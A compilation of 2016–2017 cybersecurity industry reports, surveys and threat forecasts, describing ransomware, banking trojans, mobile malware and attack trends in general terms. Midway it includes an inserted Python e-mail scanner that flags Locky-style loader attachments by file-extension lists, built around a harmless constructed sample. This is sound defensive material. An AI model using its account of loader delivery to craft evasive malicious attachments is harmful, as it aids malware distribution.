Social Democrat MP Nick Haekkerup also complained on his Facebook page that he was forced to leave electronic devices such as an iPhone and iPad at home, so he would have to live a week without the Internet, e-mail and social networks.

The deputies were not left without mobile communication, however. Lidegaard published a photo of the old Nokia push-button phone that they were allowed to take with them to Russia. The plans of the Danish parliamentary delegation in the Russian Federation were not reported.

Danish deputies were allowed to use only old push-button phones in Russia; a photo from Martin Lidegaard's Facebook page

Danish ministries were repeatedly subjected to hacker attacks in 2015-2016, Reuters reports, citing a report by the cyber security division of the Danish Ministry of Defence. According to the authorities, state-sponsored foreign hacker groups were behind the attacks. Although the report does not name the specific country responsible for the cyber attacks, it notes that Russia and China have extensive cyber espionage capabilities.

The cyber security department of the Danish Ministry of Defence also reported that the threat of cybercrime against local authorities and companies remains "very high". Martin Lidegaard said earlier that the European Union should prepare for hybrid war with Russia.

In 2016 U.S. intelligence services accused Russia of hacker attacks aimed at increasing the vote for the Republican Donald Trump during the presidential elections. Moscow denies these statements.[25]

Positive Technologies: in 2017 the number of cyber attacks on banks will grow by a third

On January 27, 2017 Positive Technologies published its conclusions about the 2016 trends in information security that will influence the future of the whole industry. The assessment is based on attack statistics and on data obtained during the company's project work.

Top 5 events of 2016 that had an impact on the information security industry

  • Data loss is no better than loss of money: the result of most computer attacks in 2016 was a leak of confidential information.
  • Targeted attacks: 62% of the year's cyber attacks were targeted. The main penetration method was targeted phishing. The average time an attacker stays in a system is up to 3 years. Only 10% of attacks are discovered by the victims themselves.
  • Financial systems: attackers use simple methods and legitimate software for disguise, and prepare their attacks more carefully. A 30% growth in attacks on financial institutions is expected. The main reason is reactive approaches to cybersecurity and the absence of regular security analysis. Hackers, having seen "easy money", start replicating successful attacks.
  • Top-level ransom: large companies are subjected to extortion with encrypting trojans (ransomware), DDoS attacks and website vulnerabilities. The extortion method in which hackers demand a ransom for information about vulnerabilities found in companies' web applications (so-called bug poaching) has already become widespread. The listed extortion techniques will continue to develop in 2017.
  • The power sector is open to attack: among the industrial control systems reachable from the Internet, building automation and electric power management systems lead. Nearly half of the vulnerabilities found in 2016 are high-risk.
  • Between ICS and the Internet of Things: control automation became available to mass users without the necessary security measures. The situation in the Internet of Things may require regulation of a minimum security level for devices; if manufacturers do not show awareness on this question, the state will step in to deal with certification and standardization of such products.
  • Government websites are the most frequent target of web attacks. The most popular attacks are SQL Injection and Path Traversal.
  • Do not trust satellite navigation: attacks with GPS signal spoofing have become available to everyone.
  • Android controls you: as smartphones become the main "control panel" of modern life, the attention of attackers to Android-based devices does not weaken. The "sphere of influence" of mobile applications is expanding: applications for controlling household appliances or for augmented-reality games give attackers new opportunities to interfere in victims' lives.
  • Attacks through vulnerabilities of hardware platforms: legitimate hardware capabilities provided by manufacturers can be used for purposes other than intended. Hardware attacks are frightening because they often do not depend on the OS and cannot be quickly prevented.

The expected growth of attacks on financial systems, government websites and corporations using simple techniques (phishing, legitimate software) shows the need for modern event monitoring and incident investigation systems (SIEM) and attack detection systems based on machine learning (WAF), and also requires raising employee awareness[26].

The weak security of industrial control systems (ICS), combined with a worsening geopolitical situation, may lead in 2017 to an increase in the number of cyber attacks on industrial facilities, especially in the energy sector. Using strong passwords and disconnecting ICS components from the Internet can reduce the risks, but more serious measures include regular security audits, timely updating of vulnerable software and the use of protective tools tailored to the specifics of ICS.

Users of mobile devices are advised to pay special attention to application security and to use settings that restrict access to personal information and potentially dangerous actions.

Attacks on the Internet of Things showed that users are often deprived of the ability to control the security of new devices themselves. To mitigate the risk, vendors or IoT service providers need to carry out dedicated security testing of devices. Either additional rules from state regulators or self-regulation driven by the threat of reputational loss after large attacks can oblige them to do so. Incidentally, experts predict that in 2017 attackers will expand the range of IoT devices they use: "smart" household appliances (down to kettles and refrigerators) are in the risk zone.


Kaspersky Cybersecurity Index

In April 2017 Kaspersky Lab announced a recorded decrease in the share of Russian users exposed to cyber threats and of those neglecting computer protection. This is shown by the updated Kaspersky Cybersecurity Index, which the company calculated for the second half of 2016.

The first Kaspersky Cybersecurity Index was published in September 2016 and contained data for the first half of 2016. The second wave of the user survey on which the index is based allowed Kaspersky Lab not just to update the figures but also to trace changes in user behaviour.

The index is formed from three indicators reflecting respondents' attitude to cyber threats: Unconcerned, the share of users who do not believe they can become victims of cybercriminals; Unprotected, the share of users who have not installed protection on their computers, tablets and smartphones; and Affected, the percentage of users who have become victims of cybercriminals.

Thus, the cyber security index for Russia for the second half of 2016 looks like this: 83%–37%–33% (Unconcerned–Unprotected–Affected). In other words, the vast majority of Russian users (83%) do not believe that cyber threats can affect their lives in any way; this figure has not changed since the first half of 2016. More than a third of users (37%) still neglect protective software; when the first index was compiled this figure was slightly higher, 39%. Finally, 33% of the surveyed Russians admitted that they had faced cyber threats. This figure changed most significantly compared with the first half of 2016, when 42% of Russian users were victims of cybercriminals.

For comparison, the global cyber security index looks like this: 74%–39%–29%. So on average in the world there are fewer users unconcerned about cyber threats, and fewer victims of them, than in Russia.

In addition to the information security index itself, the website also contains other data reflecting the behaviour of users in different countries. For example, the statistics show that Russian users have started to communicate much more via messengers (86% versus 69% in the first wave), to manage their finances through online banking (80% versus 56%) and to store personal data in the cloud (51% versus 24%).

The Kaspersky Cybersecurity Index is based on data obtained from thousands of users worldwide in large-scale surveys conducted by Kaspersky Lab together with B2B International. The latest wave of the survey covered 17,377 users in 28 countries, including Russia.

2016 set a record for the number of cyber threats

On March 1, 2017 Trend Micro Incorporated described 2016 as the year of online extortion: the number of cyber threats reached its highest point in the whole history of observation, and companies' losses reached $1 billion globally.

On March 1, 2017 Trend Micro published its annual security report for 2016, titled "2016 Security Roundup: A Record Year for Enterprise Threats". According to the document, ransomware and fraud using corporate mail (BEC) became popular with cybercriminals looking for ways to carry out corporate online extortion. The number of ransomware families grew by 752%.

Trend Micro and the Zero Day Initiative (ZDI) discovered 765 vulnerabilities, 678 of them through ZDI's bug bounty program.

Compared with the number of vulnerabilities discovered by Trend Micro and ZDI in 2015, the number of vulnerabilities in Apple products grew by 145%, while in Microsoft products it decreased by 47%. The use of vulnerabilities in exploit kits fell by 71%, which is partly connected with the arrest in June 2016 of members of the hacker group behind the Angler exploit kit.

"As cyber threats constantly evolved and became ever more complex, attackers shifted the focus of their attacks from ordinary users to those who have money, that is, to corporations. In 2016 we witnessed cybercriminals stealing the funds of companies and organizations for financial gain, and we have no hope that this trend will change. The purpose of this research is to raise companies' awareness of the tactics attackers actively use to compromise corporate data, and to help organizations build their protection strategy so as to always stay a step ahead of attackers and resist potential attacks."

Ed Cabrera, head of information security at Trend Micro

The Trend Micro Smart Protection Network technology blocked more than 81 billion threats in 2016, 56% more than in 2015. In the second half of 2016 more than 3 thousand attacks per second on the company's clients were blocked on average. Over this period 75 billion threats were received via e-mail.

Ernst & Young: readiness to defend grows, readiness to invest does not

On December 23, 2016 EY reported on the readiness of the world's leading companies to resist cyber attacks and on insufficient investment in fighting cybercrime, as well as the lack of plans to eliminate the negative consequences of such attacks.

These conclusions are drawn from the 2016 information security survey "Path to cyber resilience: Sense, resist, react".

1,735 companies from different countries and industries took part in the survey. According to the study, half of respondents (50%) believe they are capable of detecting a carefully prepared cyber attack, the highest level of confidence since 2013, thanks to investment in cyber threat sensors for predicting the consequences of an attack, and to the creation of continuous monitoring mechanisms, Security Operations Centers (SOC) and active defence mechanisms.

Despite these investments, 86% of respondents admit that their cyber security function does not fully meet the organization's needs.

Nearly two thirds (64%) of respondents have no dedicated program for collecting and analyzing information about cyber threats, or limit themselves to ad hoc activity in this area. As for vulnerability detection, more than half (55%) lack the appropriate technical means and capabilities, or use them irregularly and occasionally. 44% have no Security Operations Center for continuous monitoring of cyber attacks and potential threats.

More than half (57%) of respondents reported having had a cyber security incident in their company. Nearly half (48%) consider outdated controls and the architecture of their information security to be the organization's greatest vulnerability; in 2015, 34% of respondents said so.

"Organizations have done a lot of work to prepare their defences against cyber attacks, but cybercriminals devise new tricks no less quickly. In this regard, organizations should pay more attention to developing skills and capabilities for countering cyber attacks. They should also think not only about protection and security, but also about cyber resilience, an approach that provides for preparation, full response to cyber security incidents and elimination of their consequences across the whole organization. Companies must have an action plan for the event of a cyber attack, be ready to quickly eliminate its consequences and restore normal operation of the organization. Otherwise they put their clients, employees, suppliers and ultimately their own future at risk."

Paul van Kessel, head of EY's global cyber security advisory practice

Respondents are concerned by the following cyber security issues:

  • increased risks due to careless or ignorant actions of employees (55% compared with 44% in 2015),
  • unauthorized access to data (54% compared with 32% in 2015).

The main constraints hindering the work of the information security function:

  • insufficient funding (61% compared with 62% in 2015);
  • shortage or absence of qualified personnel (56% compared with 57% in 2015);
  • lack of understanding or support from the organization's management (32%, unchanged from 2015).

Despite the all-encompassing nature of the modern digital ecosystem, the study showed:

  • 62% of organizations consider it unlikely that cyber security spending would increase after an attack that caused no visible damage to operations
  • 58% indicated a low probability of increasing cyber security spending as a result of a cyber attack on a competitor
  • 68% consider it unlikely that cyber security spending would increase as a result of a cyber attack on a supplier
  • nearly half of respondents (48%) would not, within the first week after an attack, start informing clients whose business the attack could have affected, even if the cyber attack obviously led to a data compromise
  • 42% of organizations do not have an approved communication strategy or action plan for a serious attack.

Organizations face a growing number of devices connected to their digital ecosystems. Nearly three quarters (73%) of the surveyed organizations are concerned that owners of mobile devices (tablets, smartphones, laptops) do not comply with the rules for their use, and that users know too little about the possible risks and consequences.

Half of respondents (50%) saw the main risk of the growing use of mobile devices in the possibility of their loss.

Internet propaganda among the significant cyber threats of 2017

On December 19, 2016 Trend Micro, publishing its forecast for 2017, placed Internet propaganda among the main cyber threats, without downplaying the influence of Internet of Things vulnerabilities and cyber attacks.

According to the company's experts, in 2017 cybercriminals will move to new frontiers along with the development of technology. In 2016 cybersecurity experts noted a new round of improvement in cyber attacks and the emergence of various new targets for them[27].

"We predict the emergence of new methods of attack on large corporations, an expansion of online extortion tactics that will affect an ever wider range of devices, and the use of cyber propaganda methods to manipulate public opinion."

Raimund Genes, Chief Technology Officer of the Japanese company Trend Micro


As of December 2016, 46% of the population of various countries obtain information from Internet sources. As this figure grows, so does the threat of cyber propaganda, understood as the automated generation of information traffic aimed at Internet users and the appearance of large numbers of fake news items on social networks.

Examples of such manipulation are the fake news items that appeared on Facebook during the U.S. presidential elections. Users of the social network found information that Pope Francis supported Donald Trump, and "news" about the death of the FBI agent who was investigating the Democratic candidate Hillary Clinton. U.S. President Barack Obama noted the likelihood that such news influenced the course of the presidential elections.

At the end of November 2016 Facebook announced the start of its plan to fight fake news. Measures include improving the algorithm for determining the reliability of news items, improving interaction with users who in turn report unreliable information, and turning to third parties and organizations for expert evaluation.

Panda Security: forecast for 2017

On December 15, 2016 Panda Security published its forecast of malicious activity for 2017. The characteristics of the coming year: a decrease in the number of new malware samples and a higher professional level of attacks.

Cybercriminals focus their efforts on the attacks that can bring them huge profits, using the most effective techniques for this purpose and raising the professional level of their operations so as to "earn" money faster and more easily.



Trojans will be the focus of attention in information security. They will absorb other attacks that have become traditional for data theft. The pursuit of profit is the main motivation of cybercriminals, and ransomware is the easiest and most effective way to achieve this goal. Something will remain unchanged: victims of such threats will have to decide whether or not to pay the criminals a ransom to recover their data. When making that decision, Panda Security urges them to bear in mind that paying the ransom does not guarantee full recovery of the stolen data.

The number of attacks directed against companies will grow as these attacks become more and more sophisticated. Companies have already become the priority target for cybercriminals, since the information they store is more valuable than that available from individuals.

Internet of Things (IoT)

The company sees Internet of Things (IoT) the next nightmare for Information Security Services. Technology revolution led to a full integration in network of small devices which can turn into the points allowing hackers to get into corporate networks.

DDoS attacks

The largest DDoS attacks of 2016 were carried out in recent months, the company reported. These attacks are executed by botnets of thousands of infected IoT devices (IP cameras, routers and so on). In 2017 the number of similar attacks will increase.

Mobile phones

It will be simpler for cybercriminals to focus on one operating system to obtain maximum profit. Android users can expect a difficult and dangerous 12 months.

Cyber wars

The unstable situation in international relations can lead to serious consequences for cyber security. Governments of different countries aim to get access to large volumes of information (while encryption becomes ever more popular), and intelligence agencies will be even more interested in obtaining information that can benefit their countries' industry. Such a global trend can interfere with data exchange initiatives in 2018.

PandaLabs: Cyber security. Forecasts for 2017

IBM and Ponemon Institute research: companies are still not ready to resist cyber attacks

In November IBM and the Ponemon Institute published the results of a global study of organizations' resilience to cyber attacks titled "Cyber Resilient Organization". According to the results, only 32% of IT and security specialists consider that their companies have a high level of cyber defense. In 2015 this indicator was 35%. In addition, 66% of respondents participating in the 2016 study note that their organizations are not ready to recover after cyber attacks[28]

Problems connected with incident response, as the study shows for the second year in a row, are the main obstacle to making organizations resilient to cyber security threats. 75% of respondents said that their companies have no Cyber Security Incident Response Plan. In the organizations where such a plan exists, 52% of respondents have not reviewed or updated the document since its adoption, or such a procedure is not provided for at all. At the same time, 41% of study participants noted that over the last 12 months the time required to resolve a cyber incident increased. 31% of respondents answered that this indicator decreased.

"The study of enterprise resilience to cyber security threats shows that in 2016 organizations around the world are still not ready to respond to and neutralize incidents," said John Bruce, head and co-founder of Resilient, an IBM company. "Security leaders can achieve considerable improvements by making incident response the main priority and concentrating on planning, preparation and information gathering."

According to respondents, an Incident Response Platform is one of the most effective security technologies helping organizations resist cyber attacks, along with identity and authentication management and intrusion detection and prevention systems.

The study also revealed typical problems hindering the raising of organizations' cyber security level. Most survey participants (66%) consider that insufficient planning and low readiness are the main barriers to increasing enterprise resilience to cyber threats. Respondents also point out that the complexity of IT and business processes grows faster than the capability to prevent, detect and react to cyber attacks, which makes companies vulnerable. This year 46% of study participants named the increased complexity of IT processes as the main obstacle to building reliable protection of business information; the indicator grew from 36% in the 2015 study. 52% of respondents said that the complexity of business processes is an essential barrier, compared with 47% in 2015.

Key findings of the study:

Companies are exposed to frequent and successful cyber attacks

  • More than half of respondents (53%) suffered at least one data leak in the last two years
  • 74% of respondents said that within the last year they faced cyber threats caused by the human factor
  • Over the last two years, 74% of respondents said they were exposed to numerous hacker attacks, and 64% were repeatedly compromised by phishing

Organizations cannot ensure continuous operation and recover quickly after attacks

  • 68% consider that their organizations are not capable of resisting cyber attacks
  • 66% are not sure that their company can effectively recover after an attack

The biggest barrier is lack of planning and preparation

  • Only 25% use an incident response plan. 23% have not adopted such a plan at all
  • Only 14% of respondents audit their incident response plans more often than once a year
  • 66% call lack of planning the biggest barrier preventing their organization from becoming resilient to cyber attacks

The capability to react to cyber attacks has not significantly improved

  • 48% consider that their organization's resilience to cyber attacks decreased (4%) or did not improve (44%) within the last 12 months
  • 41% of respondents consider that the time to resolve a cyber security incident increased or considerably increased, while 31% said that it decreased or significantly decreased

Check Point noted a 5% growth in the number of cyber attacks and malware

The Check Point research team found that both the number of malware families and the number of attacks grew by 5%. The volume of attacks on business in October reached a peak compared with all previous months of 2016. The number of attacks with the Locky ransomware continues to grow, so in October it moved from third to second place among the most used malware types. The reason for Locky's popularity is the constant emergence of its modifications and its distribution mechanism, mainly via spam mailings. Locky's authors change the type of file used to load the ransomware (doc, xls and wsf files) and also make significant structural changes to the spam letter. The ransomware itself is nothing exclusive, but cybercriminals spend a lot of time infecting as many computers as possible. The Zeus banking trojan also returns to the top 3.

1. ↔ Conficker — used in 17% of registered attacks. A worm providing remote execution of operations and download of malware. The infected computer is controlled by a bot that contacts the command server for instructions.

2. ↑ Locky — ransomware that appeared in February 2016. It spreads mainly via spam letters containing an infected Word or Zip file that downloads and installs malware encrypting user files. In October it was registered in 5% of known attacks.

3. ↑ Zeus — also mentioned in 5% of detected attacks. A trojan that attacks Windows platforms and is often used to steal banking information by capturing entered credentials (formgrabber) and keylogging.
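The Locky distribution mechanism described above (spam carrying doc, xls and wsf loaders, sometimes wrapped in a Zip archive) is something a mail gateway can screen for before delivery. The following is an added example, not code from Check Point or from the original page; the extension list beyond doc/xls/wsf, the function names and the constructed sample message are assumptions:

```python
"""Screen a raw e-mail for the loader file types the report ties to Locky spam
(doc, xls, wsf), including copies wrapped in a Zip attachment.
Added example; sample data below is constructed, not captured."""
import email
import io
import zipfile
from email.message import EmailMessage
from email.policy import default

# doc/xls/wsf come from the report; macro-enabled Office variants and script
# types are an assumption added for completeness.
RISKY_EXT = {"doc", "docm", "xls", "xlsm", "wsf", "js", "vbs"}
ARCHIVE_EXT = {"zip"}
DISGUISE_EXT = {"pdf", "jpg", "txt"}  # assumption: common "innocent" first extensions


def _ext(name: str) -> str:
    """Lower-cased extension of a file name, '' if none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def scan_zip(data: bytes) -> list:
    """Return member names inside a zip payload whose extension is risky.
    Nested archives are not expanded; an unreadable zip is itself reported."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if _ext(info.filename) in RISKY_EXT:
                    hits.append(info.filename)
    except zipfile.BadZipFile:
        hits.append("<unreadable zip>")
    return hits


def scan_message(raw: bytes) -> list:
    """Return (attachment_name, reason) findings for a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = _ext(name)
        payload = part.get_payload(decode=True) or b""
        if ext in RISKY_EXT:
            findings.append((name, f"direct {ext} attachment"))
        elif ext in ARCHIVE_EXT:
            for member in scan_zip(payload):
                findings.append((name, f"archive contains {member}"))
        # Double extension such as invoice.pdf.wsf: the visible part looks harmless.
        stem = name.rsplit(".", 1)[0] if "." in name else name
        if ext in RISKY_EXT and _ext(stem) in DISGUISE_EXT:
            findings.append((name, "double extension disguise"))
    return findings


def build_sample() -> bytes:
    """Construct a lure-style message: a zip holding a .wsf plus a bare .doc."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_8821.wsf", "constructed placeholder, not a real script")
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "staff@example.invalid"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="invoice.zip")
    msg.add_attachment(b"constructed placeholder bytes", maintype="application",
                       subtype="msword", filename="statement.doc")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in scan_message(build_sample()):
        print(f"quarantine candidate: {name}: {reason}")
```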

The number of attacks on Russia in October considerably decreased, which allowed it to fall from 52nd to 101st place. Attacks on companies in the country were carried out using such malware as InstalleRex, Conficker, Kometaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos and Sality. Last month Botswana, Uganda and Zambia were attacked most, and the fewest attacks were registered in Uruguay, Argentina and the Dominican Republic.

Mobile malware continues to pose considerable danger to business: 15 of the 200 malware types attack mobile devices. For the last seven months HummingBad, malware for Android, remains the most used for attacks on mobile devices. The three most used types of mobile threats in October:

1. ↔ HummingBad is malware for Android that, using a rootkit resistant to reset, installs fraudulent applications and with small modifications can show additional malicious activity, including installation of keyloggers, theft of credentials and bypass of the encrypted e-mail containers used by companies.

2. ↔ Triada is a modular backdoor for Android that grants elevated privileges to downloaded malware and helps it embed itself into system processes. Triada has also been seen substituting URLs loaded in the browser.

3. ↑ XcodeGhost is a compromised version of the Xcode iOS developer platform. This unofficial version of Xcode is modified so that it can inject malicious code into any application developed and compiled with it. The injected code sends information about the application to the command server, allowing the infected application to read data from the device clipboard.

"The fact that the top 10 malware remains unchanged since September suggests that cybercriminals are happy with their results. And for companies it is a signal that they need to react proactively to protect critical business assets. The effectiveness of such programs as Conficker also says that so far companies do not use protection of the necessary level," comments Vasily Dyagilev, chief representative of Check Point Software Technologies. "To protect itself, business needs a comprehensive approach and advanced protection measures for networks, endpoints and mobile devices to stop malware before infection. This is possible with such solutions as Check Point’s SandBlast™ Zero-Day Protection and Mobile Threat Prevention, which are capable of resisting the latest threats."

Fortinet on trends in cyber security

Fortinet published six forecasts prepared by specialists of its FortiGuard Labs threat research department concerning the development of threats in 2017. The forecasts describe the strategies and methods which, according to Fortinet researchers, cybercriminals will use in the near future. The scale of potential negative effects of cyber attacks on the world digital economy is also characterized.

1. From smart to even smarter: automated and human-like attacks will demand more intelligent security systems

Threats are becoming more sophisticated and autonomous. Next year the emergence of malware with human-like behavior, capable of adapting and learning from successful actions, is expected. This will make attacks more effective and harmful.

2. IoT device producers will bear responsibility for security violations

If IoT device producers fail to ensure the safety of their products and to retain buyers whose interest will decrease owing to concerns about information security risks, this will lead to significant changes in the world digital market. The interest of consumers, suppliers and other groups in developing and implementing security standards under which device producers can be held liable for damage caused by the behavior of their products will significantly increase.

3. 20 billion IoT devices: the weak link of cloud infrastructure

The weakest link of a cloud security system is not its architecture. The main source of threat is the millions of remote devices that get access to cloud resources. The emergence of tools developed specifically to defeat end devices is expected. This will lead to client-side attacks which will be able to easily punch gaps in the security systems of cloud service providers. The number of organizations implementing a protection and segmentation strategy based on security systems will increase. Such systems allow creating, configuring and applying uniform security policies to physical, virtual and private cloud environments, from IoT to the cloud.

4. Attacks will heat up the situation in "smart cities"

Next year the rapidly developing building automation and management systems will become targets of attackers. If any of these integrated systems, which are of special interest to cybercriminals, comes under attack, it can lead to severe disruption of services to citizens.

5. Ransomware is only the beginning

It is expected that cybercriminals will carry out targeted attacks whose targets will be celebrities, political figures and large organizations. Automated attacks using ransomware will allow attackers to exploit economies of scale and enrich themselves by simultaneously deceiving many victims, each of whom pays a small amount. Most often IoT devices will be exposed to the attacks.

6. New technologies will have to compensate for the critical shortage of qualified security personnel

In view of the current shortage of information security specialists, many organizations and countries wishing to enter the world digital market will be in considerable danger. The personnel of these organizations lack the experience and training needed for such tasks as developing security policy, protecting important resources which move freely between network environments, or identifying modern advanced attacks and taking response measures.

Predicted threat development trends and conclusions

The Internet of Things (IoT) and cloud technology still often appear in forecasts, but some trends have come to light over time. The degree of Internet activity of both organizations and individuals has considerably increased, which promotes growth in the number of potential attack vectors. Besides, anything can become a target, and in the same way any means can become a weapon. Threats are becoming more sophisticated, they can function independently, and it is harder and harder to detect them. And the last trend: old threats return, improved with new technologies, which opens new horizons in threat identification and analysis.

3.2 million PCs are vulnerable, 0.002 million have means of protection

In October 2016 the engineering department of Talos (the Cisco division engaged in research and analysis of information security threats) recalled the traditions of cybercriminals adapted to the digital era.

Cyber crime has become a large-scale problem for humanity; it affects users, companies and states. The actions of hackers can cause material damage and paralyze the work of corporations, banks, public services and systems.

Martin Lee, head of the engineering department of Talos
The models by which attackers conduct their activity are not new. They use traditional schemes, adapting them to the realities of the digital era.

The classical model of criminal activity, kidnapping with a ransom demand, has been widely adopted by cyber swindlers. If earlier gangsters were limited by the territory in which they worked, cybercriminals know no limits. The first case of kidnapping with a ransom demand in digital space was recorded in 1989 in Thailand. The swindler sent e-mails to medical institutions demanding that money for the stolen data be transferred to an address in Panama. This type of racketeering worked for 16 years.

In 2005 GP coders appeared. With these tools criminals encrypt files on the infected device and demand money from the user for decryption. Creating encryption software is a very difficult process, so attackers often use fakes. Having paid, the user may not get the stolen documents back, as with high probability they are already deleted. Criminals still use this type of racketeering, only improving their cryptography techniques.

The next stage of evolution of DDoS attacks began in March 2016 when we encountered the activity of the SamSam gang. This group gets into the organization's server system, reaches the key data needed for daily operations, encrypts it and demands a ransom. The hacked company has a big temptation to pay the criminals, as these files are important for daily work.

Cyber crime has become a business. Attackers conduct their activity like business companies. They aim to lower costs and maximize profit, and enter other markets. Criminals carefully calculate their benefit. The size of the ransom should be slightly lower than the value of the stolen documents to the company, and it should cover the expenses of conducting criminal activity. In their work attackers use the same hi-tech tools as business companies. Large players in this black market are serviced by service organizations; an ecosystem of specialists and criminal groups who perform DDoS attacks has formed.

It is necessary to remember that if you have something of value, there will surely be a swindler who will try to steal it. According to us, 3.2 million computers and systems in the world are vulnerable to hacker attacks, and only 2100 of them have the necessary means of protection installed.

Martin Lee

Europol named eight top trends in cybercrime

  • Crime-as-a-Service: "underground digital services" are supported by the crime-as-a-service model, which is becoming ever more popular and in demand. It brings together specialized suppliers of hacker tools and organized criminal groups. Terrorists have obvious potential to gain access to this sector in the near future.
  • Ransomware: ransomware and banking "trojans" remain the main threats among malicious software, and this trend will hardly change in the near future.
  • Criminal use of data: data remains a key commodity for cybercriminals. In many cases it is used for immediate financial gain, but increasingly it is sold for more complex fraud schemes, encrypted for the purpose of obtaining a ransom, or used directly for extortion.
  • Payment fraud: EMV (chip and PIN), geo-blocking and other industry security measures continue to help fight card fraud effectively, but nevertheless the number of attacks against ATMs also grows. Organized criminal groups are beginning to compromise payments made with contactless (NFC) cards.
  • Online sexual abuse of children: the use of end-to-end encrypted platforms for exchanging media files, together with anonymous payment systems, promotes the escalation of live streaming of child abuse.
  • Abuse of the "dark web": the "dark part of the world wide web" continues to enable criminals participating in a number of illegal activities, such as sharing files recording sexual abuse of children. The extent to which extremist groups use cyber technologies to carry out attacks is limited for now, but the offer of hacker tools and services and of illegal goods on the "dark web" can quickly change the current situation.
  • Social engineering: law enforcement agencies registered growth in the number of phishing attacks directed at high-value targets. Attacks against the CEOs of enterprises and organizations have become the main threat.
  • Virtual currencies: Bitcoin remains the currency swindlers prefer for paying for illegal goods and services on the "dark web". Bitcoin has also become the standard payment solution for ransom demands and other forms of extortion.

Growth in the volume, scale and cost of cybercrime is still observed. Lately these indicators have reached unprecedented levels. Some EU member states say that cases of cyber security crime may already exceed the number of traditional crimes[29].

Growth in the number of swindlers, together with an increase in the opportunities to participate in highly profitable illegal activity, partially feeds this trend, as does the emergence of new tools for committing cybercrime in such areas as mobile malware and fraud directed against ATMs. Nevertheless, the core of the problem is insufficient observance of digital security standards by legal entities and individuals.

A considerable part of cybercriminal activity still uses rather old techniques for which protections are available but not widely adopted.

9-fold growth in unknown malware in a decade

On September 22, 2016 Check Point Software Technologies Ltd. published the results of a study noting 9-fold growth in unknown malware attacking enterprise systems and concluding that companies need to implement best-in-class protective architecture.

The company's experts analyzed data received from 31 thousand Check Point security gateways worldwide and described what known and unknown malware types and attacks affect companies' IT systems, and what the effects of integrating mobile devices into enterprise IT infrastructure are. An estimate of companies' losses from hacking and the costs of eliminating its effects is also given.

Picture of an average day at an enterprise according to the Check Point 2016 Security Report (2016)

Within the SANS 2016 Threat Landscape Study, conducted together with researchers of the SANS Institute, specialists polled more than 300 IT and security professionals worldwide.

The poll's purpose was to find out:

  • what threats organizations face in reality,
  • when and how these threats become security incidents,
  • what types of threats have the most serious effects,
  • what critical tasks face companies wishing to protect themselves.

Both reports, the Check Point Security Report and the SANS 2016 Threat Landscape Study, give an idea of the current cyber threat landscape, from the network to the end device.

Main findings of the study:

  • The number of unknown malware types continues to grow. Researchers detected a 9-fold increase in the number of unknown programs attacking organizations. The reason for growth in the number of network penetrations is employees downloading unknown malware every 4 seconds. Every month specialists detect nearly 12 million unknown malware variants. In the last two years there have been more such "finds" than in the whole previous decade.
  • Security cannot keep up with rapidly developing mobile devices. 60% of all time spent on digital media falls on smartphones and tablets. For business, mobile devices are a horror in terms of access security and a blessing in terms of increased productivity. Although employees do not intentionally want to harm company security, every fifth of them causes a breach, via mobile malware or an infected Wi-Fi access point.
  • End devices are the starting point of most attacks. In the studied companies user devices are the most frequent cause of breaches and the most important component of cyber defense, and in 75% of cases hackers use e-mail to carry out attacks. 39% of attacks on end devices bypass firewall protection, and regular checks reveal 85% of threats only after they have got into the companies.

Both reports warn: effective security begins with implementing best-in-class protective architecture that helps solve present and future problems of protecting IT infrastructure. Advanced threat prevention, mobile device protection and network segmentation are the critical components necessary for information security of the modern company.

Cybercriminals target the mining industry

On August 11, 2016 Trend Micro Incorporated published the report "Cyber Threats to the Mining Industry", which concludes that cybercriminals' interest in the mining industry is growing.

Banks, financial and medical institutions were earlier the main targets of cybercriminals; now they have turned their attention to mining industry enterprises as well. The problem of cyber attacks in this industry is closely connected with the growing automation of its processes. Manual work and simple mechanisms have been replaced by devices controlled centrally by special software.

Such enterprises use operational technology (OT): hardware and software that records changes in the production process and manages it. At the same time in many organizations OT is at best poorly protected from possible cyber attacks. And the increasing penetration of cloud computing, business intelligence systems and the Internet of Things into the industry leads to merging of IT and OT, which gives attackers broad access to system components and crucial processes.

Most Industrial Control Systems (ICS) used in 2016 were developed a decade ago. In connection with the new requirements of connection to the corporate network and use of remote access, ICS developers, as a rule, adapt corresponding IT solutions to simplify integration and cut development costs. However, this leads to a number of new vulnerabilities.

Examples of large cyber attacks in the mining industry:

In April and May 2015 the Canadian gold mining company Detour Gold Corp. was attacked by a hacker group calling itself Angels_Of_Truth. As a result attackers stole more than 100 GB of valuable information. 18 GB of this data was placed on a torrent tracker.

In February 2016 the New South Wales Department of Industry, Resources and Energy was also attacked by hackers. Attackers unsuccessfully tried to get access to confidential information concerning mineral extraction permits.

In April 2016 the Canadian gold mining company Goldcorp suffered a large data leak. Attackers published 14.8 GB of data, placing the relevant document on Pastebin, a popular website for storing and sharing data, with a link to download it. The archive contained personal data of employees and financial information.

Cyber attacks in the industry are made mainly to obtain certain technical knowledge to achieve competitive advantage, weaken another state's economy, obtain certain data (personally identifiable information (PII), financial information or accounts), or even to protest against companies in the extractive industry as a source of environmental pollution.

Cyber attacks can really have a great influence on a company's business, for example leading to deterioration in financial performance, theft of intellectual property, loss of competitive advantage, etc. All this becomes possible because of cybercriminals' ability to get access to the necessary information. In the mining industry attackers are interested first of all in:

  • data on pricing of metals and minerals;
  • intellectual property, for example production methods, raw material processing, chemical formulas, software, etc.;
  • information on state policy, and on decisions and decision-making processes of corporate heads;
  • data on new potential deposits;
  • inventory information on ore and the production process;
  • data from mine monitoring systems used for production control, security and environmental condition monitoring in real time.

Cyber attacks in the mining industry can not only cause losses due to production downtime, but also have a negative impact on the company's share price and cause damage to the national or regional economy if it depends on such an enterprise.

The most frequently used methods of committing cyber attacks today are:

  • phishing and social engineering;
  • exploitation of vulnerabilities;
  • infection of a website that enterprise staff visit most often;
  • misconfiguration of the operating system;
  • drive-by downloads;
  • malvertising;
  • compromise of third-party vendors;
